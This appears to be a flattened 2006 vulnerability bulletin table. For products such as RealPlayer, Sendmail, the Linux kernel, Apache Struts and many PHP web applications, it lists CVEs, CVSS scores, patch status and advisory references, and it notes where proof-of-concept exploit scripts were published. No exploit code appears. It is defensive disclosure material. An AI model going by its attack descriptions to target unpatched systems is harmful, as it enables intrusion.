RealPlayer Enterprise 1.x;Gentoo Linux; SuSE Novell Linux Desktop 9.0, Linux Professional 10.0 OSS, 9.3 x86_64, 9.3, 9.2 x86_64, 9.2, Linux Personal 10.0 OSS, 9.3 x86_64, 9.3, 9.2 x86_64, 9.2

Multiple vulnerabilities have been reported: a buffer overflow vulnerability was reported in the handling of the 'chunked' Transfer-Encoding method due to a boundary error, which could let a remote malicious user execute arbitrary code; a buffer overflow vulnerability was reported when processing SWF files due to a boundary error, which could let a remote malicious user execute arbitrary code; and a vulnerability was reported due to the incorrect use of the 'CreateProcess()' API when executing other programs, which could let a remote malicious user execute arbitrary code.

Updates available

Gentoo

SuSE

RedHat

A Proof of Concept exploit script, realplayer-swf-PoC.pl.txt, has been published.

RealNetworks Products Multiple Buffer Overflow

CVE-2005-2922
CVE-2005-2936
CVE-2006-0323

7
(CVE-2005-2936)

7
(CVE-2006-0323)

 

Secunia Advisory: SA19358, March 27, 2006

Gentoo Linux Security Advisory, GLSA 200603-24, March 26, 2006

SUSE Security Announcement, SUSE-SA:2006:018, March 23, 2006

RedHat Security Advisory, RHSA-2006:0257-9, March 22, 2006

US-CERT VU#231028

US-CERT VU#172489

Packetstorm, April 1, 2006

Multiple Vendors

SuSE Linux Professional 10.0 OSS, 10.0, Personal 10.0 OSS;
Linux kernel 2.6-2.6.13, Linux kernel 2.4-2.4.32

 

A Denial of Service vulnerability has been reported in FlowLable.

Upgrades available

SUSE

RedHat

RedHat

Mandriva

RedHat

RedHat

Mandriva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel IPv6 FlowLable Denial of Service

CVE-2005-3806

Security Focus, Bugtraq ID: 15729, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:067, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

RedHat Security Advisory, RHSA-2006:0101-9, January 17, 2006

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

Mandriva Security Advisory, MDKSA-2006:018, January 20, 2006

RedHat Security Advisories, RHSA-2006:0190-5 & RHSA-2006:0191-9, February 1, 2006

Mandriva Security Advisory, MDKSA-2006:044, February 21, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Ubuntu Linux 5.0 4 powerpc, i386, amd64, 4.1 ppc, ia64, ia32;
Linux kernel 2.6.10, rc2, 2.6.8, rc1

A remote Denial of Service vulnerability has been reported in the kernel driver for compressed ISO file systems when attempting to mount a malicious compressed ISO image.

Ubuntu

SUSE

Mandriva

Conectiva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel ISO File System Remote Denial of Service

CVE-2005-2457

Ubuntu Security Notice, USN-169-1, August 19, 2005

SUSE Security Announcement, SUSE-SA:2005:050, September 1, 2005

Mandriva Linux Security Advisory, MDKSA-2005:218, November 30, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory.
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Ubuntu Linux 5.10 powerpc, i386, amd64, 5.0 4 powerpc, i386, amd64, 4.1 ppc, ia64, ia32;
MandrakeSoft Linux Mandrake 2006.0 x86_64, 2006.0, 10.2 x86_64, 10.2, 10.1 x86_64, 10.1, Corporate Server 3.0 x86_64, 3.0;
GNU Mailman 2.1-2.1.5, 2.0-2.0.14

A remote Denial of Service vulnerability has been reported in the email date parsing functionality due to an error in the handling of dates.

Mandriva

Ubuntu

Debian

RedHat

Trustix

SGI

There is no exploit code required.

GNU Mailman Remote Denial of Service

CVE-2005-4153

Security Focus, Bugtraq ID: 16248, January 16, 2006

Ubuntu Security Notice, USN-242-1 January 16, 2006

Debian Security Advisory, DSA-955-1, January 25, 2006

RedHat Security Advisory, RHSA-2006:0204-10, March 7, 2006

Trustix Secure Linux Security Advisory #2006-0012, March 10, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Multiple Vendors

VServer util-vserver 0.30.210, 0.30.209, util-vserver 0; Debian Linux 3.1, sparc, s/390, ppc, mipsel, mips, m68k, ia-64, ia-32, hppa, arm, amd64, alpha

A vulnerability has been reported in the util-vserver package 'suexec,' which could let a remote malicious user obtain elevated privileges.

No workaround or patch available at time of publishing.

There is no exploit code required.

Util-VServer Elevated Privileges

CVE-2006-1656

Not Available Security Focus, Bugtraq ID: 17361, April 4, 2006

Openwall

Openwall
crypt_blowfish 0.4.7 & prior

A vulnerability has been reported in the 'crypt_gensalt' functions for BSDI-style extended DES-based and FreeBSD-style MD5-based password hashes because they do not evenly and randomly distribute salts, which makes it easier for malicious users with a stolen copy of the password file to guess
passwords due to the increased number of salt collisions.

Updates available

Currently we are not aware of any exploits for this vulnerability.

Openwall 'crypt_blowfish' Information Disclosure

CVE-2006-0591

Secunia Advisory: SA18772, February 8, 2006

Paul Vixie

Vixie Cron 4.1

A vulnerability has been reported due to insecure creation of temporary files when crontab is executed with the '-e' option, which could let a malicious user obtain sensitive information.

Fedora

RedHat

RHSA-2006:0117-7

SGI

There is no exploit code required; however, a Proof of Concept exploit script has been published.

Vixie Cron
Crontab
Information Disclosure

CVE-2005-1038

Security Focus, 13024, April 6, 2005

Fedora Update Notification,
FEDORA-2005-320, April 15, 2005

Fedora Update Notifications,
FEDORA-2005-
550 & 551,
July 12, 2005

RedHat Security Advisory, RHSA-2005:361-19, October 5, 2005

RedHat Security Advisory, RHSA-2006:0117-7, March 15, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

RedHat

RedHat initscripts 7.93.24, Enterprise Linux WS 4, ES 4, AS 4m Desktop 4.0

A vulnerability has been reported when the 'sbin/service' command is run due to an error when handling certain variables, which could let a malicious user obtain elevated privileges.

Updates available

SGI

Currently we are not aware of any exploits for this vulnerability.

Red Hat Initscripts Elevated Privileges

CVE-2005-3629

7

RedHat Security Advisory, RHSA-2006:0016-18, March 7, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Samba.org

Samba 3.0.21, a-c

A vulnerability has been reported because the 'winbindd' daemon saves the machine trust account credentials to world-readable winbind log files in clear text, which could let a malicious user obtain sensitive information.

Patches available

Fedora

Trustix

There is no exploit code required.

Samba Machine Trust Account Information Disclosure

CVE-2006-1059

1.6

Secunia Advisory: SA19455, March 30, 2006

Trustix Secure Linux Security Advisory #2006-0018, April 4, 2006

Sendmail Consortium

Sendmail prior to 8.13.6

A vulnerability has been reported due to a race condition caused by the improper handling of
asynchronous signals, which could let a remote malicious user execute arbitrary code.

Updates available

RHSA-2006:0264-8

RHSA-2006:0265-9

Fedora

Gentoo

AIX

Sun

SuSE

FreeBSD

Slackware

OpenBSD

Avaya

Debian

HP

NetBSD

SGI

F-Secure

SGI

A Proof of Concept exploit script, sendtest.c, has been published.

Sendmail Asynchronous Signal Handling Remote Code Execution

CVE-2006-0058

8

Internet Security Systems Protection Advisory, March 22, 2006

Technical Cyber Security Alert TA06-081A

US-CERT VU#834865

RedHat Security Advisories, RHSA-2006:0264-8 & RHSA-2006:0265-9, March 22, 2006

Sun(sm) Alert Notification
Sun Alert ID: 102262, March 24, 2006

Gentoo Linux Security Advisory, GLSA 200603-21, March 22, 2006

SUSE Security Announcement, SUSE-SA:2006:017, March 22, 2006

FreeBSD Security Advisory, FreeBSD-SA-06:13, March 22, 2006

Slackware Security Advisory, SSA:2006-081-01, March 22, 2006

Avaya Security Advisory, ASA-2006-074, March 24, 2006

Debian Security Advisory,
DSA-1015-1, March 24, 2006

HP Security Bulletin,
HPSBUX02108, March 27, 2006

NetBSD Security Advisory, /NetBSD-SA2006-010, March 28, 2006

SGI Security Advisory, 20060302-01-P, March 22, 2006

F-Secure Security Bulletin, FSC-2006-2, March 28, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

storeBackup

storeBackup 1.18-1.18.4

A vulnerability has been reported due to the insecure creation of temporary files, which could let a malicious user obtain sensitive information.

Upgrades available

SUSE

Debian

There is no exploit code required.

StoreBackup Insecure Temporary File Creation

CVE-2005-3146
CVE-2005-3147
CVE-2005-3148

2.3
(CVE-2005-3146)

2.3
(CVE-2005-3147)

5.6
(CVE-2005-3148)

Security Focus, Bugtraq ID: 14985, September 30, 2005

SUSE Security Summary Report,
SUSE-SR:2005:021, September 30, 2005

Debian Security Advisory,
DSA-1022-1, April 4, 2006

Sun Microsystems, Inc.

Solaris 9.0 _x86, 9.0, 8.0 _x86, 8.0,
Sun Cluster 3.1 4/04

A vulnerability has been reported in the SunPlex Manager GUI due to an unspecified error, which could let a malicious user obtain sensitive information.

Update information

There is no exploit code required.

Sun Cluster SunPlex Manager Information Disclosure

CVE-2006-1601

1 Sun(sm) Alert Notification
Sun Alert ID: 102278, March 29, 2006

The Open Group

Open Motif 2.2.3

Two buffer overflow vulnerabilities have been reported in libUil (User Interface Language): a buffer overflow vulnerability was reported in 'diag_issue_diagnostic()' due to the use of the vsprintf() libc procedure, which could let a remote malicious user execute arbitrary code; and a vulnerability was reported in 'open_source_
file()' due to the use of the strcpy() libc procedure, which could let a remote malicious user execute arbitrary code.

Gentoo

RedHat

Currently we are not aware of any exploits for these vulnerabilities.

Open Motif libUil Buffer Overflows

CVE-2005-3964

Security Focus, Bugtraq ID: 15678, December 2, 2005

Gentoo Linux Security Advisory, GLSA 200512-16, December 28, 2005

Red Hat Security Advisory, RHSA-2006:0272-01, April 4, 2006

xine

xine-lib 1.1.1

A buffer overflow vulnerability has been reported when processing a malformed MPEG stream due to a failure to properly bounds check user-supplied input data prior to copying it to an insufficiently-sized memory buffer, which could let a remote malicious user execute arbitrary code.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, xinelib_poc.pl, has been published.

Xine-Lib Malformed MPEG Stream Buffer Overflow
Not Available Security Focus, Bugtraq ID: 17370, April 4, 2006
Multiple Operating Systems - Windows/UNIX/Linux/Other
Vendor & Software Name
Description

Common Name

CVSS
Resources

3dsrc.com

MonAlbum 0.8.7

SQL injection vulnerabilities have been reported in 'image_agrandir.php' due to insufficient sanitization of the 'pnom' and 'pcourriel' parameters and in 'index.php' due to insufficient sanitization of the 'pc' parameter, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

MonAlbum SQL Injection

CVE-2006-1585

4.7 Secunia Advisory: SA19503, April 3, 2006

AngelineCMS

AngelineCMS 0.8.1

A file include vulnerability has been reported in 'Loadkernel.PHP' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, an exploit script, angelineCMS.pl, has been published.

AngelineCMS Remote File Include

CVE-2006-1653

Not Available Security Focus, Bugtraq ID: 17371, April 4, 2006

Apache Software Foundation

libapreq2 2.0.6

A remote Denial of Service vulnerability has been reported due to errors in the 'apreq_parse_
headers()' and 'apreq_parse_
urlencoded()' functions.

Update available

Debian

DSA 1000-2

Currently we are not aware of any exploits for this vulnerability.

Apache Libapreq2 Remote Denial of Service

CVE-2006-0042

2.3

Security Focus, Bugtraq ID: 16710, February 17, 2006

Debian Security Advisory,
DSA-1000-1, March 14, 2006

Debian Security Advisory, DSA 1000-2, April 3, 2006

Apache Software Foundation

Struts prior to 1.2.9

Multiple vulnerabilities have been reported: a vulnerability was reported in 'RequestProcessor' because all actions can be cancelled, which could let a remote malicious user bypass security restrictions; a remote Denial of Service vulnerability was reported in 'ActionForm' because the public method 'getMultipartRequest
Handler()' gives access to elements in 'CommonsMultipart
RequestHandler' and 'BeanUtils;' and a vulnerability was reported in 'LookupDispatchAction' due to insufficient sanitization, which could let a remote malicious user execute arbitrary HTML and script code.

Updates available

Vulnerabilities can be exploited through a web client.

Apache Struts Multiple Vulnerabilities

CVE-2006-1546
CVE-2006-1547
CVE-2006-1548

7
(CVE-2006-1546)

3.3
(CVE-2006-1547)

2.3
(CVE-2006-1548)

Security Focus, Security Tracker Alert ID: 1015856, April 1, 2006

aphpkb

aphpkb 0.57

Multiple Cross-Site Scripting vulnerabilities have been reported due to insufficient sanitization of user-supplied input before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

Andy's PHP Knowledgebase Multiple Cross-Site Scripting

CVE-2006-1438

7 Security Focus, Bugtraq ID: 17377, March 27, 2006

Arab Portal

Arab Portal 2.0.1 Stable

Multiple input-validation vulnerabilities have been reported including Cross-Site Scripting and SQL injection, which could let a remote malicious user execute arbitrary HTML, script code, and SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

ArabPortal Multiple Input Validation
  Security Focus, Bugtraq ID: 17375, April 4, 2006

aWeb Labs

aWebBB 1.2

Several vulnerabilities have been reported: Cross-Site Scripting vulnerabilities were reported in 'post.php' due to insufficient sanitization of the 'tname' and 'fpost' parameters, in 'editac.php' due to insufficient sanitization of the 'fullname,' 'emailadd,' 'country,' 'sig,' and 'otherav' parameters, and in 'register.php' due to insufficient sanitization of the 'fullname,' 'emailadd,' and 'country' parameters, which could let a remote malicious user execute arbitrary HTML and script code; and SQL injection vulnerabilities were reported in 'accounts.php,' 'changep.php,' 'editac.php,' 'feedback.php,' 'fpass.php,' 'login.php,' 'post.php,' 'reply.php,' and reply_log.php' due to insufficient sanitization of the 'username' parameter, in 'dpost.php' due to insufficient sanitization of the 'p' parameter, in 'ndis.php' and 'list.php' due to insufficient sanitization of the 'c' parameter, and in 'search.php' due to insufficient sanitization of the 'q' parameter, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through use of a web client.

AWebBB Multiple Input Validation

CVE-2006-1637
CVE-2006-1638

2.3
(CVE-2006-1637)

1.9
(CVE-2006-1638)

Secunia Advisory: SA19486, April 3, 2006

Barracuda Networks

Barracuda Spam Firewall with firmware prior to 3.3.03.022 and with spamdef prior to 3.0.10045

Several buffer overflow vulnerabilities have been reported: a buffer overflow vulnerability was reported when a remote malicious user submits email that contains a specially crafted LHA archive with a long filename, which could lead to the execution of arbitrary code; and a buffer overflow vulnerability was reported when a remote malicious user submits an email that contains a specially crafted ZOO archive, which could lead to the execution of arbitrary code.

Update to firmware version 3.3.03.022.

Currently we are not aware of any exploits for these vulnerabilities.

Barracuda Spam Firewall Buffer Overflows

CVE-2004-0234
CVE-2006-0855

10
(CVE-2004-0234)

3.9
(CVE-2006-0855)

Security Tracker Alert ID: 1015866, April 4, 2006

BASE Basic Analysis and Security Engine

BASE Basic Analysis and Security Engine 1.2-1.2.2

A vulnerability has been reported in 'base_maintenance.php' due to an unspecified error, which could let a remote malicious user bypass authentication mechanisms.

Updates available

Vulnerability could be exploited with a web client.

Basic Analysis and Security Engine Authentication Bypass

CVE-2006-1505

2.3 Secunia Advisory: SA19510, April 3, 2006

Cisco Systems

CSS11500 Content Services Switch 7.30 (00.09)S, 7.30 (00.08)S, 7.20 (03.10)S, 7.20 (03.09)S, 7.10 (05.07)S, 7.5, 7.4, CSS11500 Content Services Switch

A remote Denial of Service vulnerability has been reported in the HTTP compression functionality

Workaround information

Currently we are not aware of any exploits for this vulnerability.

Cisco 11500 Content Services Switch Remote Denial of Service

CVE-2006-1631

2.3 Cisco Security Advisory, cisco-sa-20060405, April 5, 2006

Claroline

Claroline 1.7.4, 1.7.2, 1.6, rc1, beta, 1.5.4, 1.5.3, 1.5

Multiple vulnerabilities have been reported: a Directory Traversal vulnerability was reported in 'rqmkhtml.php' due to insufficient sanitization of the 'file' parameter before using to view files, which could let a remote malicious user obtain sensitive information; a Cross-Site Scripting vulnerability was reported in 'rqmkhtml.php' due to insufficient sanitization of the 'file' parameter before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code; and a file include vulnerability was reported in 'claroline/
learnPath/include/
scormExport.inc.php' due to insufficient verification of the 'includePath' before using to include files, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited with a web client; however, Proof of Concept exploit scripts, claroline-1.7.4-remote-and
-local-file-include.php and claroline_174_incl_xpl.html, have been published.

Claroline Multiple Vulnerabilities

CVE-2006-1594
CVE-2006-1595
CVE-2006-1596

7
(CVE-2006-1594)

2.3
(CVE-2006-1595)

4.9
(CVE-2006-1596)

Secunia Advisory: SA19461, April 3, 2006

CzarNews

CzarNews 1.14

Several vulnerabilities have been reported: a script insertion vulnerability was reported in 'news.php' due to insufficient sanitization of the 'email' parameter, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'cn_auth.php' due to insufficient sanitization of the 'usern' and 'passw' parameters, in 'news.php' due to insufficient sanitization of the 's' parameter, and in 'dpost.php' due to insufficient sanitization of the 'a' parameter, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities could be exploited with a web client.

CzarNews Script Insertion & SQL Injection

CVE-2006-1640
CVE-2006-1641

2.3
(CVE-2006-1640)

 

Secunia Advisory: SA19541, April 5, 2006

dbbs.sup.fr

DbbS 2.0-alpha & prior

An SQL injection vulnerability has been reported in 'topics.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

DbbS SQL Injection

CVE-2006-1579

7 Security Focus, Bugtraq ID: 17338, March 31, 2006
DIA

DIA 0.87-0.94

Multiple remote buffer overflow vulnerabilities have been reported due to a failure to properly bounds-check user-supplied input before copying it into insufficiently sized memory buffers, which could let a remote malicious user execute arbitrary code.

The vendor has released version 0.95-pre6, along with a patch for 0.94 to address these issues.

Mandriva

Ubuntu

Fedora

Debian

Currently we are not aware of any exploits for these vulnerabilities.

DIA XFIG File Import Multiple Remote Buffer Overflows

CVE-2006-1550

5.6

Security Focus, Bugtraq ID: 17310, March 29, 2006

Mandriva Security Advisory, MDKSA-2006:062, April 3, 2006

Debian Security Advisory,
DSA-1025-1, April 6, 2006

Esqlane
lapse

Esqlanelapse 2.2, 2.0

A Cross-Site Scripting vulnerability has been reported due to insufficient sanitization of unspecified parameters before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

Updates available

Vulnerability could be exploited with a web client.

Esqlanelapse Cross-Site Scripting

CVE-2006-1570

2.3 Security Focus, Bugtraq ID: 17331, April 1, 2006

Exponent

Exponent CMS prior to 0.96.5 RC 1

Vulnerabilities have been reported in the banner module and image functionality due to unspecified input validation errors, which could let a remote malicious user execute arbitrary PHP code.

The vendor has released version 0.96.5-RC1 to address this issue.

Vulnerabilities can be exploited through a web client.

Exponent CMS Arbitrary Script Execution

CVE-2006-1604
CVE-2006-1605
CVE-2006-1606
CVE-2006-1607

7
(CVE-2006-1604)

7
(CVE-2006-1605)

2.3
(CVE-2006-1606)

7
(CVE-2006-1607)

Security Focus, Bugtraq ID: 17357, April 3, 2006

Fred Scalliet

Blank'N'Berg 0.2

Several vulnerabilities have been reported: a Directory Traversal vulnerability was reported due to insufficient validation of the '_path' parameter, which could let a remote malicious user obtain sensitive information; and a Cross-Site Scripting vulnerability was reported in 'index.php' due to insufficient sanitization of the '_path' parameter before displaying, which could let a remote malicious user execute arbitrary code.

No workaround or patch available at time of publishing.

Vulnerabilities may be exploited with a web client; however, Proof of Concept exploits have been published.

Blank'N'Berg Directory Traversal & Cross-Site Scripting

CVE-2006-1581
CVE-2006-1582

4.7
(CVE-2006-1581)

4.7
(CVE-2006-1582)

Security Tracker Alert ID: 1015854, March 31, 2006

gtd-php

gtd-php 0.5

Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of input passed to various fields in 'newProject.php,' 'newList.php,' 'newWaitingOn.php,' newChecklist.php,' 'newContext.php,' 'newCategory.php,' and 'newGoal.php' before using, which could let a remote malicious user execute arbitrary HTML and script code; and a Script Insertion vulnerability was reported due to insufficient sanitization of the 'listTItle' parameter in 'listReport.php,' in 'projectReport.php' due to insufficient sanitization of the 'projectName' parameter, and in 'checklistReport.php' due to insufficient sanitization of the 'checklistTitle' parameter, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited via a web client.

gtd-php Cross-Site Scripting & Script Insertion

CVE-2006-1479

2.3 Secunia Advisory: SA19512, April 3, 2006

Hitachi

Groupmax World Wide Web 2.x, 3.x, World Wide Web Desktop 5.x, 6.x, World Wide Web Desktop for Jichitai 6.x,World Wide Web Desktop for Scheduler 5.x, World Wide Web for Scheduler 2.x, 3.x

A Cross-Site Scripting vulnerability has been reported due to insufficient sanitization of unspecified parameters before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

Update information

Vulnerability can be exploited through a web client.

Hitachi Groupmax World Wide Web Cross-Site Scripting

CVE-2006-1574

4.7 Hitachi Security Advisory, HS06-005, March 31, 2006

Horde

Horde 3.0-3.0.9, 3.1

A vulnerability has been reported in Help Viewer which could let a remote malicious user execute arbitrary PHP code.

Updates available

SuSE

Gentoo

Vulnerability can be exploited via a web client.

Horde Help Viewer Remote PHP Code Execution

CVE-2006-1491

7

Security Focus, Bugtraq ID: 17292, March 29, 2006

SUSE Security Summary Report, SUSE-SR:2006:007, March 31, 2006

Gentoo Linux Security Advisory, GLSA 200604-02, April 4, 2006

Interact

Interact 2.1, 2.1.1

Multiple vulnerabilities have been reported: a vulnerability was reported in the 'login.php' script because different error responses are returned depending on whether the username is valid or invalid, which could let a remote malicious user obtain sensitive information; a vulnerability was reported due to insufficient sanitization of the 'search_terms' parameter in 'search.php' and various fields when creating an account, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'login.php' due to insufficient sanitization of the 'user_name' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

Interact Multiple Vulnerabilities

CVE-2006-1642
CVE-2006-1643
CVE-2006-1644

Not Available Secunia Advisory: SA19488, April 5, 2006

ISPofEgypt

Site Man 0

An SQL injection vulnerability has been reported in 'admin_login.asp' due to insufficient sanitization of the 'txtpassword' parameter before using in a SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

SiteMan SQL Injection

CVE-2006-1586

7 Secunia Advisory: SA19500, April 3, 2006

Jaakko Keranen

Doomsday Engine 1.9, 1.8.6

Format string vulnerabilities have been reported in the 'Con_Message()' and 'conPrintf()' functions when connecting to port 13209/tcp and passing a specially crafted JOIN command, which could let a remote malicious user cause a Denial of Service or execute arbitrary code.

Gentoo

Vulnerabilities can be exploited through use of a web client; however, a Proof of Concept exploit has been published.

Doomsday Engine Format Strings

CVE-2006-1618

7

 

Security Tracker Alert ID: 1015860, April 4, 2006

Gentoo Linux Security Advisory, GLSA 200604-05, April 6, 2006

KGB

KGB Archiver 1.1.5 21

A Directory Traversal vulnerability has been reported when decompressing archives due to an input validation error, which could let a remote malicious user obtain sensitive information.

Update available

There is no exploit code required.

KGB Archiver Directory Traversal

CVE-2006-1611

2.3 Secunia Advisory: SA19511, April 3, 2006

lucidCMS

lucidCMS 2.0.0 RC4

Cross-Site Scripting vulnerabilities have been reported in 'index.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

LucidCMS Cross-Site Scripting

CVE-2006-1634
CVE-2006-1635

2.3
(CVE-2006-1634)

2.3
(CVE-2006-1635)

Security Focus, Bugtraq ID: 17360, April 3, 2006

Mantis

Mantis 1.0.1, 1.0.0rc5 & prior

Cross-Site Scripting vulnerabilities have been reported in 'view_all_set.php' due to insufficient sanitization of the 'start_day,' 'start_year,' and 'start_month' parameters before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, a Proof of Concept exploit has been published.

Mantis Cross-Site Scripting

CVE-2006-1577

7 Security Focus, Bugtraq ID: 17326, March 31, 2006

mediaslash.
com

MediaSlash Gallery 0

A file include vulnerability has been reported in 'index.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

MediaSlash Gallery Remote File Include

CVE-2006-1573

7 Security Focus, Bugtraq ID: 17323, March 30, 2006

MyBB Group

MyBulletinBoard 1.10

An HTML injection vulnerability has been reported due to insufficient sanitization of the 'email' BBcode tag when posting a message, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited via a web client.

MyBulletinBoard Email HTML Injection

CVE-2006-1625

7 Security Focus, Bugtraq ID: 17368, April 4, 2006

MySQL AB

MySQL 5.0.18

A vulnerability has been reported when handling query logging due to a discrepancy between the handling of NULL bytes in input data, which could let a remote malicious user bypass certain security restrictions.

Mandriva

A Proof of Concept exploit has been published.

MySQL Query Logging Bypass

CVE-2006-0903

4.9

Security Focus, Bugtraq ID: 16850, February 27, 2006

Mandriva Security Advisory, MDKSA-2006:064, April 3, 2006

NetBSD

NetBSD 3.0, 2.1, 2.0-2.0.3, 1.6-1.6.2

A vulnerability has been reported in 'If_Bridge(4)' because used stack memory is not zero out by IOCTL calls, which could let a malicious user obtain sensitive information.

Patches available

Currently we are not aware of any exploits for this vulnerability.

NetBSD Information Disclosure

CVE-2006-1588

1.6 NetBSD Security Advisory, NetBSD-SA2006-005, March 30, 2006

NetBSD

NetBSD 1.x

A vulnerability has been reported because the 'mail' program creates records with insecure permissions when the 'set record' setting is present in a user's .mailrc and the default umask is set, which could let a malicious user obtain sensitive information.

Patch information

Currently we are not aware of any exploits for this vulnerability.

NetBSD mail(1) Insecure File Permissions

CVE-2006-1587

1.6 NetBSD Security Advisory, NetBSD-SA2006-007, March 30, 2006

o2php.com

Oxygen 1.1-1.1.3

An SQL injection vulnerability has been reported in 'post.php' due to insufficient sanitization of the 'fid' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

Oxygen SQL Injection

CVE-2006-1572

2.3 Secunia Advisory: SA19481, March 31, 2006

PHP Group

PHP 4.3.x, 4.4.x, 5.0.x, 5.1.x

A vulnerability has been reported in the 'html_entity_decode()' function because it is not binary safe, which could let a remote malicious user obtain sensitive information.

The vulnerability has been fixed in the CVS repository and in version 5.1.3-RC1.

Mandriva

There is no exploit code required; however, a Proof of Concept exploit has been published.

PHP Information Disclosure

CVE-2006-1490

2.3

Secunia Advisory: SA19383, March 29, 2006

Mandriva Security Advisory, MDKSA-2006:063, April 2, 2006

phpBB Group

phpBB 2.0.19

A Cross-Site Scripting vulnerability has been reported in 'profile.php' due to insufficient sanitization of the 'cur_password' parameter before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through use of a web client.

phpBB Cross-Site Scripting

CVE-2006-1603

2.3 Secunia Advisory: SA19494, April 3, 2006

phpMyChat

phpMyChat 0.14.5, 0.14.4

An SQL injection vulnerability has been reported in 'MessagesL.PHP3' due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, an exploit script, phpMyChat_0.14.5_
SQLINJ.php, has been published.

PHPMyChat SQL Injection
Not Available Security Focus, Bugtraq ID: 17382, April 5, 2006

PHPNuke-Clan

PHPNuke-Clan 3.0.1

A file include vulnerability has been reported in 'modules/vWar_account/
includes/functions_
common.php' due to insufficient verification of the 'vwar_root' parameter before using to include files, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, an exploit script, pnc.pl.txt, has been published.

PHPNuke-Clan Remote File Include

CVE-2006-1602

7 Security Focus, Bugtraq ID: 17356, April 3, 2006

PHPSelect

Submit-A-Link 0

An HTML injection vulnerability has been reported in 'index.php' due to insufficient sanitization of user-supplied input before using in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, Proof of Concept exploit scripts, linksubmit_poc.pl and linksubmit.txt, have been published.

PHPSelect Submit-A-Link HTML Injection

CVE-2006-1622

7 Security Focus, Bugtraq ID: 17348, April 1, 2006

r2xDesign

qliteNews 2005.07.01

An SQL injection vulnerability has been reported in 'loginprocess.php' due to insufficient sanitization of the 'username' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client.

qliteNews SQL Injection

CVE-2006-1571

5.6 Secunia Advisory: SA19476, March 31, 2006

redcms.
co.uk

RedCMS 0.1

Several vulnerabilities have been reported: a script insertion vulnerability was reported in 'register.php' due to insufficient sanitization of the 'Email,' 'Location,' and "website' fields before storing in a member's profile, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'login.php' and 'register.php' due to insufficient sanitization of the 'username' parameter and in 'profile.php' due to insufficient sanitization of the 'u' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited with a web client.

RedCMS SQL Injection & Script Insertion

CVE-2006-1568
CVE-2006-1569

5.6
(CVE-2006-1568)

5.6
(CVE-2006-1569)

